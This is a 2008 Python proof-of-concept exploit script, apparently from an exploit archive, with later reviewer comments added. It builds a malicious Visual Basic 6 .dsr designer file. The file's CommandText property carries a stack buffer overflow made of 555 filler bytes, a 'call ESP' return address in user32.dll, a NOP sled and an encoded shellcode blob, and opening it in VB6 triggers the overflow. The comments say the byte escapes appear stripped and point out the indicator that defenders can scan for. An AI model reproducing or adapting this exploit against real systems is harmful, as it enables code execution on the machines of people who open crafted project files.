# Title : MS Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit
# Published : 2008-04-04
# Author : shinnai
#usage: exploit.py
# Flat Python 2 script (print statements, bare except): builds a VB6
# DataEnvironment designer (.dsr) file whose Recordset1.CommandText property
# holds an oversized value, and writes it to the current directory.
# Historical proof-of-concept (2008); kept as-is for reference.
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoFn'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
# Filler placed in front of get_EIP in the CommandText value below; its
# length (555) is what the author chose for this build of VB6 and is not
# derivable from anything else in this listing.
buff = "A" * 555
# Four bytes the author labels as a "call ESP" address inside user32.dll.
# NOTE(review): as printed, this and the literals below carry no backslash
# escapes (presumably an extraction artefact), so they are plain ASCII text
# here rather than raw bytes.
get_EIP = "xFFxBEx3Fx7E" #call ESP from user32.dll
nop = "x90" * 12
# Opaque payload supplied by the author; what it does cannot be determined
# from this listing and is not documented here.
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"
)
# Text of the .dsr file. Every property except CommandText is an ordinary,
# benign DataEnvironment designer setting; the only anomalous field is the
# CommandText line, which concatenates buff + get_EIP + nop + shellcode + nop.
# Defensive note: a .dsr whose CommandText property is hundreds of bytes of
# repeated filler followed by non-text data is the indicator to look for when
# scanning or reviewing project files of this type.
dsrfile = (
"VERSION 5.00n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1n"
" ClientHeight = 6315n"
" ClientLeft = 0n"
" ClientTop = 0n"
" ClientWidth = 7980n"
" _ExtentX = 14076n"
" _ExtentY = 11139n"
" FolderFlags = 1n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"n'
" TypeInfoCookie = 0n"
" Version = 4n"
" NumConnections = 1n"
" BeginProperty Connection1n"
' ConnectionName = "Connection1"n'
" ConnDispId = 1001n"
" SourceOfData = 3n"
' ConnectionSource= ""n'
" Expanded = -1 'Truen"
" QuoteChar = 96n"
" SeparatorChar = 46n"
" EndPropertyn"
" NumRecordsets = 1n"
" BeginProperty Recordset1n"
' CommandName = "Command1"n'
" CommDispId = 1002n"
" RsDispId = 1003n"
# The overlong property value: this is the line that makes the file malformed.
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"n'
' ActiveConnectionName= "Connection1"n'
" CommandType = 2n"
" dbObjectType = 1n"
" Locktype = 3n"
" IsRSReturning = -1 'Truen"
" NumFields = 1n"
" BeginProperty Field1n"
" Precision = 10n"
" Size = 4n"
" Scale = 0n"
" Type = 3n"
' Name = "ID"n'
' Caption = "ID"n'
" EndPropertyn"
" NumGroups = 0n"
" ParamCount = 0n"
" RelationCount = 0n"
" AggregateCount = 0n"
" EndPropertyn"
"Endn"
'Attribute VB_Name = "DataEnvironment1"n'
"Attribute VB_GlobalNameSpace = Falsen"
"Attribute VB_Creatable = Truen"
"Attribute VB_PredeclaredId = Truen"
"Attribute VB_Exposed = Falsen"
)
# Write the file in text mode into the current working directory. The bare
# except below swallows every exception (permission denied, disk full, ...)
# and prints a generic usage message instead of the real cause.
try:
    out_file = open("DataEnvironment1.dsr",'w')
    out_file.write(dsrfile)
    out_file.close()
    print "nFILE CREATION COMPLETED!n"
except:
    print " n -------------------------------------"
    print " Usage: exploit.py"
    print " -------------------------------------"
    print "nAN ERROR OCCURS DURING FILE CREATION!"